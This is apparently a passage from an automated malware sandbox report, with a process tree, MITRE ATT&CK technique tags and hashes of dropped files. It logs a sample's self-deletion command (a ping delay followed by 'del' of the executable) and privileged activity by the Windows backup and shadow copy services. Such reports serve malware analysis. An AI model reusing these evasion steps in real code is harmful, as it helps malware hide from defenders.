C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\a60695b4b866bee8db3902280ae16a8b6faa3171ab46cc575691fc78b751ee9f.exe"2⤵PID:7220
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1516
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:880
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5364
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:10788
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:9484
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:13844
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 13744 -ip 137441⤵PID:13836
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53b46483fcd5decfd4cb33d4a3029e065
SHA1e4981cc0d7421e2bb3aaec41f357a0982adb132f
SHA256a9c5e8d2ad3cf04bbe8c42eae7e63e801e6cb1b321a888c9a0c7c7c624219d50
SHA512adcbcab19f0cde6cb8c307f2e21fafdc7da2013c73237f3d9e8f7b94b3c46b006a02ab3775c09a5bb194bf4d260a558e82730ce040def87efd2b62e7ea079c23
-
Filesize
684B
MD5567d7b934930adaca4e74b90b01eacd6
SHA10633de3718a4e338acbe1624e92ea10b2143d70c
SHA256104399449582f84ca3e7bad025facf7613a34f245eb93813923d3cd3259a32ac
SHA51282ad75ccc22a93dc50bed8cd71926a2874465dd5a7f27d6edb5055cef812191a818dc717dfe095dab4b951b8bf5a4607b75c220cad7214cacced2bc1af3eb3bc
-
Filesize
12KB
MD57bba43259561c038ade18c71ce1458fd
SHA1102cec0789a331137a13260f69f7dd705c7457c5
SHA256ef444745852b9aff7769df7371c1886e17e88563788175a366f62c19a2db8138
SHA512a09e33e32d5ff57e3a4ccef1b124e9d986ca2e1dbaa73fcd3d5289f618b6586c1f31738bf5db982e2248ee28916a0bed4fcc548a705aa2944c29a00d61ff3d78